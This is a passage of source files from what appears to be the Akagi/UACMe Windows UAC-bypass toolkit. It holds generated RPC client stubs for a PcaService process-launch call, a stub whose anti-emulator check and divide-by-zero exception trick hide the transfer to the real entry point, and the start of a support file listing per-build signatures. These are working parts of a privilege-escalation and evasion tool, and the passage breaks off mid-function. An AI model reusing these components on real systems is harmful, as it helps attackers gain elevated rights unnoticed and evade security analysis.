RPC_IF_HANDLE PcaService7_v1_0_c_ifspec;\nextern RPC_IF_HANDLE PcaService7_v1_0_s_ifspec;\n#endif /* __PcaService7_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes 
*/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w8_10/pcasvc.acf",
    "content": "[\n\texplicit_handle\n]\ninterface PcaService\n{\n\tRAiMonitorProcess();\n}\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w8_10/pcasvc.idl",
    "content": "[\n\tuuid(0767a036-0d22-48aa-ba69-b619480f38cb),\n\tversion(1.0),\n]\ninterface PcaService\n{\n\tlong RAiMonitorProcess(\n\t\thandle_t bindingHandle,\n\t\t[in]unsigned __int3264 hProcess,\n\t\t[in]long unknown0,\n\t\t[in][unique][string]wchar_t* exeFileName,\n\t\t[in][unique][string]wchar_t* cmdLine,\n\t\t[in][unique][string]wchar_t* workingDir,\n\t\t[in]long flags\n\t);\n}\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w8_10/x64/pcasvc64.c",
    "content": "/*\n\nFile has been edited after MIDL compiler, changes:\n1. XCFG BS removed\n2. Warning suppression added\n\n*/\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc.idl:\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#if defined(_M_AMD64)\n\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 )  /* redefine extern to static */\n#pragma warning( disable: 4232 )  /* dllimport identity*/\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\n\n#include <string.h>\n\n#include \"pcasvc64.h\"\n\n#define TYPE_FORMAT_STRING_SIZE   7                                 \n#define PROC_FORMAT_STRING_SIZE   73                                \n#define EXPR_FORMAT_STRING_SIZE   1                                 \n#define TRANSMIT_AS_TABLE_SIZE    0            \n#define WIRE_MARSHAL_TABLE_SIZE   0            \n\ntypedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\n    } pcasvc_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _pcasvc_MIDL_PROC_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\n    } pcasvc_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING\n    {\n    long          Pad;\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\n    } pcasvc_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
\n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\nextern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString;\nextern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString;\nextern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE   0            \n\n\n/* Standard interface: PcaService, ver. 1.0,\n   GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface =\n    {\n    sizeof(RPC_CLIENT_INTERFACE),\n    {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n    0,\n    0,\n    0,\n    0,\n    0,\n    0x00000000\n    };\nRPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface;\n\nextern const MIDL_STUB_DESC PcaService_StubDesc;\n\nstatic RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle;\n\n\nlong RAiMonitorProcess( \n    handle_t bindingHandle,\n    /* [in] */ unsigned __int3264 hProcess,\n    /* [in] */ long unknown0,\n    /* [string][unique][in] */ wchar_t *exeFileName,\n    /* [string][unique][in] */ wchar_t *cmdLine,\n    /* [string][unique][in] */ wchar_t *workingDir,\n    /* [in] */ long flags)\n{\n\n    CLIENT_CALL_RETURN _RetVal;\n\n    _RetVal = NdrClientCall2(\n                  ( PMIDL_STUB_DESC  )&PcaService_StubDesc,\n                  (PFORMAT_STRING) &pcasvc__MIDL_ProcFormatString.Format[0],\n                  bindingHandle,\n                  hProcess,\n                  unknown0,\n                  exeFileName,\n                  cmdLine,\n                  workingDir,\n                  flags);\n    return ( long  )_RetVal.Simple;\n    \n}\n\n\n#if !defined(__RPC_WIN64__)\n#error  Invalid build platform for this stub.\n#endif\n\nstatic const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString 
=\n    {\n        0,\n        {\n\n\t/* Procedure RAiMonitorProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags:  */\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  8 */\tNdrFcShort( 0x40 ),\t/* X64 Stack size/offset = 64 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\n/* 14 */\tNdrFcShort( 0x18 ),\t/* 24 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x46,\t\t/* Oi2 Flags:  clt must size, has return, has ext, */\n\t\t\t0x7,\t\t/* 7 */\n/* 20 */\t0xa,\t\t/* 10 */\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter hProcess */\n\n/* 30 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\n/* 34 */\t0xb9,\t\t/* FC_UINT3264 */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter unknown0 */\n\n/* 36 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 38 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\n/* 40 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter exeFileName */\n\n/* 42 */\tNdrFcShort( 0xb ),\t/* Flags:  must size, must free, in, */\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\n/* 46 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter cmdLine */\n\n/* 48 */\tNdrFcShort( 0xb ),\t/* Flags:  must size, must free, in, */\n/* 50 */\tNdrFcShort( 0x20 ),\t/* X64 Stack size/offset = 32 */\n/* 52 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter workingDir */\n\n/* 54 */\tNdrFcShort( 0xb ),\t/* Flags:  must size, must free, in, */\n/* 56 */\tNdrFcShort( 0x28 ),\t/* X64 Stack size/offset = 40 */\n/* 58 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter flags */\n\n/* 60 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 62 
*/\tNdrFcShort( 0x30 ),\t/* X64 Stack size/offset = 48 */\n/* 64 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 66 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\n/* 68 */\tNdrFcShort( 0x38 ),\t/* X64 Stack size/offset = 56 */\n/* 70 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString =\n    {\n        0,\n        {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  2 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/*  4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const unsigned short PcaService_FormatStringOffsetTable[] =\n    {\n    0\n    };\n\n\nstatic const MIDL_STUB_DESC PcaService_StubDesc = \n    {\n    (void *)& PcaService___RpcClientInterface,\n    MIDL_user_allocate,\n    MIDL_user_free,\n    &PcaService__MIDL_AutoBindHandle,\n    0,\n    0,\n    0,\n    0,\n    pcasvc__MIDL_TypeFormatString.Format,\n    1, /* -error bounds_check flag */\n    0x50002, /* Ndr library version */\n    0,\n    0x8010272, /* MIDL Version 8.1.626 */\n    0,\n    0,\n    0,  /* notify & notify_flag routine table */\n    0x1, /* MIDL flag */\n    0, /* cs routines */\n    0,   /* proxy/server info */\n    0\n    };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* defined(_M_AMD64)*/\n\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w8_10/x64/pcasvc64.h",
    "content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc.idl:\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0626 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n\n\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of <rpcndr.h>\n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __pcasvc64_h__\n#define __pcasvc64_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#ifndef DECLSPEC_XFGVIRT\n#if _CONTROL_FLOW_GUARD_XFG\n#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))\n#else\n#define DECLSPEC_XFGVIRT(base, func)\n#endif\n#endif\n\n/* Forward Declarations */ \n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __PcaService_INTERFACE_DEFINED__\n#define __PcaService_INTERFACE_DEFINED__\n\n/* interface PcaService */\n/* [explicit_handle][version][uuid] */ \n\nlong RAiMonitorProcess( \n    handle_t bindingHandle,\n    /* [in] */ unsigned __int3264 hProcess,\n    /* [in] */ long unknown0,\n    /* [string][unique][in] */ wchar_t *exeFileName,\n    /* [string][unique][in] */ wchar_t *cmdLine,\n    /* [string][unique][in] */ wchar_t *workingDir,\n    /* [in] */ long flags);\n\n\n\nextern RPC_IF_HANDLE PcaService_v1_0_c_ifspec;\nextern RPC_IF_HANDLE PcaService_v1_0_s_ifspec;\n#endif /* 
__PcaService_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w8_10/x86-32/pcasvc32.c",
    "content": "/*\n\nFile has been edited after MIDL compiler, changes:\n1. XCFG BS removed\n2. Warning suppression added\n\n*/\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc.idl:\n    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#if !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_)\n\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#endif\n\n#pragma warning( disable: 4211 )  /* redefine extern to static */\n#pragma warning( disable: 4232 )  /* dllimport identity*/\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\n#pragma warning( disable: 4100 ) /* unreferenced arguments in x86 call */\n\n#pragma optimize(\"\", off ) \n\n#include <string.h>\n\n#include \"pcasvc32.h\"\n\n#define TYPE_FORMAT_STRING_SIZE   7                                 \n#define PROC_FORMAT_STRING_SIZE   71                                \n#define EXPR_FORMAT_STRING_SIZE   1                                 \n#define TRANSMIT_AS_TABLE_SIZE    0            \n#define WIRE_MARSHAL_TABLE_SIZE   0            \n\ntypedef struct _pcasvc_MIDL_TYPE_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\n    } pcasvc_MIDL_TYPE_FORMAT_STRING;\n\ntypedef struct _pcasvc_MIDL_PROC_FORMAT_STRING\n    {\n    short          Pad;\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\n    } pcasvc_MIDL_PROC_FORMAT_STRING;\n\ntypedef struct _pcasvc_MIDL_EXPR_FORMAT_STRING\n    {\n    long          Pad;\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\n    } 
pcasvc_MIDL_EXPR_FORMAT_STRING;\n\n\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = \n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\n\nextern const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString;\nextern const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString;\nextern const pcasvc_MIDL_EXPR_FORMAT_STRING pcasvc__MIDL_ExprFormatString;\n\n#define GENERIC_BINDING_TABLE_SIZE   0            \n\n\n/* Standard interface: PcaService, ver. 1.0,\n   GUID={0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}} */\n\n\n\nstatic const RPC_CLIENT_INTERFACE PcaService___RpcClientInterface =\n    {\n    sizeof(RPC_CLIENT_INTERFACE),\n    {{0x0767a036,0x0d22,0x48aa,{0xba,0x69,0xb6,0x19,0x48,0x0f,0x38,0xcb}},{1,0}},\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\n    0,\n    0,\n    0,\n    0,\n    0,\n    0x00000000\n    };\nRPC_IF_HANDLE PcaService_v1_0_c_ifspec = (RPC_IF_HANDLE)& PcaService___RpcClientInterface;\n\nextern const MIDL_STUB_DESC PcaService_StubDesc;\n\nstatic RPC_BINDING_HANDLE PcaService__MIDL_AutoBindHandle;\n\n\nlong RAiMonitorProcess( \n    handle_t bindingHandle,\n    /* [in] */ unsigned __int3264 hProcess,\n    /* [in] */ long unknown0,\n    /* [string][unique][in] */ wchar_t *exeFileName,\n    /* [string][unique][in] */ wchar_t *cmdLine,\n    /* [string][unique][in] */ wchar_t *workingDir,\n    /* [in] */ long flags)\n{\n\n    CLIENT_CALL_RETURN _RetVal;\n\n    _RetVal = NdrClientCall2(\n                  ( PMIDL_STUB_DESC  )&PcaService_StubDesc,\n                  (PFORMAT_STRING) &pcasvc__MIDL_ProcFormatString.Format[0],\n                  ( unsigned char * )&bindingHandle);\n    return ( long  )_RetVal.Simple;\n    \n}\n\n\n#if !defined(__RPC_WIN32__)\n#error  Invalid build platform for this stub.\n#endif\n\n#if !(TARGET_IS_NT50_OR_LATER)\n#error You need Windows 2000 or later to run this stub because it uses these features:\n#error   
/robust command line switch.\n#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.\n#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.\n#endif\n\n\nstatic const pcasvc_MIDL_PROC_FORMAT_STRING pcasvc__MIDL_ProcFormatString =\n    {\n        0,\n        {\n\n\t/* Procedure RAiMonitorProcess */\n\n\t\t\t0x0,\t\t/* 0 */\n\t\t\t0x48,\t\t/* Old Flags:  */\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  8 */\tNdrFcShort( 0x20 ),\t/* x86 Stack size/offset = 32 */\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\n\t\t\t0x0,\t\t/* 0 */\n/* 12 */\tNdrFcShort( 0x0 ),\t/* x86 Stack size/offset = 0 */\n/* 14 */\tNdrFcShort( 0x18 ),\t/* 24 */\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\n/* 18 */\t0x46,\t\t/* Oi2 Flags:  clt must size, has return, has ext, */\n\t\t\t0x7,\t\t/* 7 */\n/* 20 */\t0x8,\t\t/* 8 */\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\n\n\t/* Parameter hProcess */\n\n/* 28 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 30 */\tNdrFcShort( 0x4 ),\t/* x86 Stack size/offset = 4 */\n/* 32 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter unknown0 */\n\n/* 34 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 36 */\tNdrFcShort( 0x8 ),\t/* x86 Stack size/offset = 8 */\n/* 38 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Parameter exeFileName */\n\n/* 40 */\tNdrFcShort( 0xb ),\t/* Flags:  must size, must free, in, */\n/* 42 */\tNdrFcShort( 0xc ),\t/* x86 Stack size/offset = 12 */\n/* 44 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter cmdLine */\n\n/* 46 */\tNdrFcShort( 0xb ),\t/* Flags:  must size, must free, in, */\n/* 48 */\tNdrFcShort( 0x10 ),\t/* x86 Stack size/offset = 16 */\n/* 50 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter workingDir */\n\n/* 52 */\tNdrFcShort( 0xb ),\t/* Flags:  
must size, must free, in, */\n/* 54 */\tNdrFcShort( 0x14 ),\t/* x86 Stack size/offset = 20 */\n/* 56 */\tNdrFcShort( 0x2 ),\t/* Type Offset=2 */\n\n\t/* Parameter flags */\n\n/* 58 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\n/* 60 */\tNdrFcShort( 0x18 ),\t/* x86 Stack size/offset = 24 */\n/* 62 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t/* Return value */\n\n/* 64 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\n/* 66 */\tNdrFcShort( 0x1c ),\t/* x86 Stack size/offset = 28 */\n/* 68 */\t0x8,\t\t/* FC_LONG */\n\t\t\t0x0,\t\t/* 0 */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const pcasvc_MIDL_TYPE_FORMAT_STRING pcasvc__MIDL_TypeFormatString =\n    {\n        0,\n        {\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\n/*  2 */\t\n\t\t\t0x12, 0x8,\t/* FC_UP [simple_pointer] */\n/*  4 */\t\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\n\t\t\t0x5c,\t\t/* FC_PAD */\n\n\t\t\t0x0\n        }\n    };\n\nstatic const unsigned short PcaService_FormatStringOffsetTable[] =\n    {\n    0\n    };\n\n\nstatic const MIDL_STUB_DESC PcaService_StubDesc = \n    {\n    (void *)& PcaService___RpcClientInterface,\n    MIDL_user_allocate,\n    MIDL_user_free,\n    &PcaService__MIDL_AutoBindHandle,\n    0,\n    0,\n    0,\n    0,\n    pcasvc__MIDL_TypeFormatString.Format,\n    1, /* -error bounds_check flag */\n    0x50002, /* Ndr library version */\n    0,\n    0x8010272, /* MIDL Version 8.1.626 */\n    0,\n    0,\n    0,  /* notify & notify_flag routine table */\n    0x1, /* MIDL flag */\n    0, /* cs routines */\n    0,   /* proxy/server info */\n    0\n    };\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\n#else\n#pragma warning(disable:4206)\n#endif /* !defined(_M_IA64) && !defined(_M_AMD64) && !defined(_ARM_) */\n\n"
  },
  {
    "path": "Source/Akagi/pcasvc/w8_10/x86-32/pcasvc32.h",
    "content": "\n\n/* this ALWAYS GENERATED file contains the definitions for the interfaces */\n\n\n /* File created by MIDL compiler version 8.01.0626 */\n/* at Mon Jan 18 19:14:07 2038\n */\n/* Compiler settings for pcasvc.idl:\n    Oicf, W1, Zp8, env=Win32 (32b run), target_arch=X86 8.01.0626 \n    protocol : dce , ms_ext, c_ext, robust\n    error checks: allocation ref bounds_check enum stub_data \n    VC __declspec() decoration level: \n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\n         DECLSPEC_UUID(), MIDL_INTERFACE()\n*/\n/* @@MIDL_FILE_HEADING(  ) */\n\n#pragma warning( disable: 4049 )  /* more than 64k source lines */\n\n\n/* verify that the <rpcndr.h> version is high enough to compile this file*/\n#ifndef __REQUIRED_RPCNDR_H_VERSION__\n#define __REQUIRED_RPCNDR_H_VERSION__ 475\n#endif\n\n#include \"rpc.h\"\n#include \"rpcndr.h\"\n\n#ifndef __RPCNDR_H_VERSION__\n#error this stub requires an updated version of <rpcndr.h>\n#endif /* __RPCNDR_H_VERSION__ */\n\n\n#ifndef __pcasvc32_h__\n#define __pcasvc32_h__\n\n#if defined(_MSC_VER) && (_MSC_VER >= 1020)\n#pragma once\n#endif\n\n#ifndef DECLSPEC_XFGVIRT\n#if _CONTROL_FLOW_GUARD_XFG\n#define DECLSPEC_XFGVIRT(base, func) __declspec(xfg_virtual(base, func))\n#else\n#define DECLSPEC_XFGVIRT(base, func)\n#endif\n#endif\n\n/* Forward Declarations */ \n\n#ifdef __cplusplus\nextern \"C\"{\n#endif \n\n\n#ifndef __PcaService_INTERFACE_DEFINED__\n#define __PcaService_INTERFACE_DEFINED__\n\n/* interface PcaService */\n/* [explicit_handle][version][uuid] */ \n\nlong RAiMonitorProcess( \n    handle_t bindingHandle,\n    /* [in] */ unsigned __int3264 hProcess,\n    /* [in] */ long unknown0,\n    /* [string][unique][in] */ wchar_t *exeFileName,\n    /* [string][unique][in] */ wchar_t *cmdLine,\n    /* [string][unique][in] */ wchar_t *workingDir,\n    /* [in] */ long flags);\n\n\n\nextern RPC_IF_HANDLE PcaService_v1_0_c_ifspec;\nextern RPC_IF_HANDLE PcaService_v1_0_s_ifspec;\n#endif /* 
__PcaService_INTERFACE_DEFINED__ */\n\n/* Additional Prototypes for ALL interfaces */\n\n/* end of Additional Prototypes */\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif\n\n\n"
  },
  {
    "path": "Source/Akagi/stub.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018 - 2022\n*\n*  TITLE:       STUB.C\n*\n*  VERSION:     3.62\n*\n*  DATE:        08 Jul 2022\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nTEB_ACTIVE_FRAME_CONTEXT g_fctx = { 0, \"(*^-^*)\" };\n\n/*\n* ucmSehHandler\n*\n* Purpose:\n*\n* Program entry point seh handler, indirect control passing.\n*\n*/\nINT ucmSehHandler(\n    _In_ UINT ExceptionCode,\n    _In_ EXCEPTION_POINTERS* ExceptionInfo\n)\n{\n    UACME_THREAD_CONTEXT* uctx;\n\n    UNREFERENCED_PARAMETER(ExceptionInfo);\n\n    if (ExceptionCode == STATUS_INTEGER_DIVIDE_BY_ZERO) {\n        uctx = (UACME_THREAD_CONTEXT*)RtlGetFrame();\n        while ((uctx != NULL) && (uctx->Frame.Context != &g_fctx)) {\n            uctx = (UACME_THREAD_CONTEXT*)uctx->Frame.Previous;\n        }\n        if (uctx) {\n            if (uctx->ucmMain) {\n                uctx->ucmMain = (pfnEntryPoint)supDecodePointer(uctx->ucmMain);\n\n                uctx->ReturnedResult = uctx->ucmMain(UacMethodInvalid,\n                    NULL,\n                    0);\n            }\n        }\n        return EXCEPTION_EXECUTE_HANDLER;\n    }\n    return EXCEPTION_CONTINUE_SEARCH;\n}\n\nDWORD StubInit(\n    _In_ PVOID EntryPoint)\n{\n    int v = 1, d = 0;\n    UACME_THREAD_CONTEXT uctx;\n\n    RtlSecureZeroMemory(&uctx, sizeof(uctx));\n\n    if (wdIsEmulatorPresent() == STATUS_NOT_SUPPORTED) {\n\n        uctx.Frame.Context = &g_fctx;\n\n        uctx.ucmMain = (pfnEntryPoint)supEncodePointer(EntryPoint);\n        RtlPushFrame((PTEB_ACTIVE_FRAME)&uctx);\n\n        __try {\n            v = 
(int)USER_SHARED_DATA->NtProductType;\n            d = (int)USER_SHARED_DATA->AlternativeArchitecture;\n            v = (int)(v / d);\n        }\n        __except (ucmSehHandler(GetExceptionCode(), GetExceptionInformation())) {\n            v = 1;\n        }\n\n        RtlPopFrame((PTEB_ACTIVE_FRAME)&uctx);\n    }\n\n    if (v)\n        return uctx.ReturnedResult;\n    else\n        return (DWORD)STATUS_ACCESS_DENIED;\n}\n"
  },
  {
    "path": "Source/Akagi/stub.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018 - 2022\n*\n*  TITLE:       STUB.H\n*\n*  VERSION:     3.59\n*\n*  DATE:        02 Feb 2022\n* \n*  Kuma stub header file\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nDWORD StubInit(_In_ PVOID EntryPoint);\n"
  },
  {
    "path": "Source/Akagi/sup.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2026\n*\n*  TITLE:       SUP.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        12 Feb 2026\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"uas.h\"\n\n//\n// Signatures array.\n//\nUSER_ASSOC_SIGNATURE* g_UserAssocSignatures[] = {\n    &UAS_SIG_7601,\n    &UAS_SIG_9600,\n    &UAS_SIG_14393,\n    &UAS_SIG_17763,\n    &UAS_SIG_18362,\n    &UAS_SIG_18363,\n    &UAS_SIG_19041,\n    &UAS_SIG_19042_19043,\n    &UAS_SIG_22000,\n    &UAS_SIG_22621,\n    &UAS_SIG_26100\n};\n\n#if defined(__cplusplus)\nextern \"C\" {\n#endif\n\n    _Must_inspect_result_\n        _Ret_maybenull_ _Post_writable_byte_size_(size)\n        void* __RPC_USER MIDL_user_allocate(_In_ size_t size)\n    {\n        return((void __RPC_FAR*) supHeapAlloc(size));\n    }\n\n#pragma warning(push)\n#pragma warning(disable: 6387)\n#pragma warning(disable: 6001)\n    void __RPC_USER MIDL_user_free(_Pre_maybenull_ _Post_invalid_ void* p)\n    {\n        supHeapFree(p);\n    }\n#pragma warning(pop)\n\n#if defined(__cplusplus)\n}\n#endif\n\n/*\n* supEncodePointer\n*\n* Purpose:\n*\n* Encodes the specified pointer.\n*\n*/\nPVOID 